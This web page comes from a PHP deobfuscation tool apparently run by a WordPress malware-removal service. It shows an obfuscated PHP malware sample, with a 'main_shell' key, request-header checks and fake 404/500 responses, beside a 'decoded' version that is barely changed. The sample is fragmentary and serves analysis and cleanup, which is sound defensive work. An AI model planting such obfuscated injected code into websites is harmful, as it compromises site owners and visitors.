Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%...



Obfuscated php code

<?php

@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
if (strpos($var02, $O[59] . $O[9] . $O[15] . $O[9])) {
    $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05 . $var04;
    $arr1[$O[25] . $O[10] . $O[7] . $O[24] . $O[52] . $O[11] . $O[15] . $O[2] . $O[18] . $O[18]] = $ooooooOOooOooOoooOOOooooOOoOoOO;
} else {
    $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05;
    $arr1[$O[25] . $O[10] . $O[7] . $O[24] . $O[52] . $O[11] . $O[15] . $O[2] . $O[18] . $O[18]] = $ooooooOOooOooOoooOOOooooOOoOoOO;
}
$ooooOoOOooOoooOOOoOoOoOoO = func4($var13);
if (strpos($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], $O[59] . $O[9] . $O[15] . $O[9])) {
    $ooooooooOOOOOOOO = $O[55];
} else {
    $ooooooooOOOOOOOO = $O[63];
}
if ($ooooOoOOooOoooOOOoOoOoOoO && substr($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], 5) == $O[59] . $O[15] . $O[4] . $O[25] . $O[18] && preg_match($O[63] . $O[16] . $O[10] . $O[63] . $O[7], @$_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[36] . $O[47] . $O[47] . $O[28] . $O[35] . $O[30] . $O[52] . $O[44] . $O[36] . $O[50] . $O[40] . $O[32] . $O[36] . $O[40] . $O[28]])) {
    echo func2($var09, $arr1);
    exit;
}
$oooOoOooOooOoooOOOoOoOoOoOo = func3($var12);
if ($oooOoOooOooOoooOOOoOoOoOoOo) {
    $ooooooOOOOOoooOOOOooooooO = func2($var07, $arr1);
    if ($ooooooOOOOOoooOOOOooooooO == $O[70] . $O[67] . $O[70]) {
        header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]);
        exit;
    } else {
        if ($ooooooOOOOOoooOOOOooooooO == $O[69] . $O[67] . $O[67]) {
            header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[69] . $O[67] . $O[67] . $O[57] . $O[33] . $O[24] . $O[4] . $O[2] . $O[3] . $O[24] . $O[10] . $O[18] . $O[57] . $O[37] . $O[2] . $O[3] . $O[22] . $O[2] . $O[3] . $O[57] . $O[28] . $O[3] . $O[3] . $O[8] . $O[3]);
            exit;
        } else {
            if ($ooooooOOOOOoooOOOOooooooO == $O[23] . $O[18] . $O[10] . $O[24] . $O[17]) {
                echo '';
                exit;
            } else {
                echo $ooooooOOOOOoooOOOOooooooO;
                exit;
            }
        }
    }
} else {
    header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]);
}
?>

Decoded(de-Obfuscated) php code

<?php

@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
if (strpos($var02, ".php")) {
    $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05 . $var04;
    $arr1["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO;
} else {
    $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05;
    $arr1["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO;
}
$ooooOoOOooOoooOOOoOoOoOoO = func4($var13);
if (strpos($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], $O[59] . $O[9] . $O[15] . $O[9])) {
    $ooooooooOOOOOOOO = $O[55];
} else {
    $ooooooooOOOOOOOO = $O[63];
}
if ($ooooOoOOooOoooOOOoOoOoOoO && substr($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], 5) == $O[59] . $O[15] . $O[4] . $O[25] . $O[18] && preg_match($O[63] . $O[16] . $O[10] . $O[63] . $O[7], @$_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[36] . $O[47] . $O[47] . $O[28] . $O[35] . $O[30] . $O[52] . $O[44] . $O[36] . $O[50] . $O[40] . $O[32] . $O[36] . $O[40] . $O[28]])) {
    echo func2($var09, $arr1);
    exit;
}
$oooOoOooOooOoooOOOoOoOoOoOo = func3($var12);
if ($oooOoOooOooOoooOOOoOoOoOoOo) {
    $ooooooOOOOOoooOOOOooooooO = func2($var07, $arr1);
    if ($ooooooOOOOOoooOOOOooooooO == $O[70] . $O[67] . $O[70]) {
        header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]);
        exit;
    } else {
        if ($ooooooOOOOOoooOOOOooooooO == $O[69] . $O[67] . $O[67]) {
            header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[69] . $O[67] . $O[67] . $O[57] . $O[33] . $O[24] . $O[4] . $O[2] . $O[3] . $O[24] . $O[10] . $O[18] . $O[57] . $O[37] . $O[2] . $O[3] . $O[22] . $O[2] . $O[3] . $O[57] . $O[28] . $O[3] . $O[3] . $O[8] . $O[3]);
            exit;
        } else {
            if ($ooooooOOOOOoooOOOOooooooO == $O[23] . $O[18] . $O[10] . $O[24] . $O[17]) {
                echo '';
                exit;
            } else {
                echo $ooooooOOOOOoooOOOOooooooO;
                exit;
            }
        }
    }
} else {
    header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]);
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.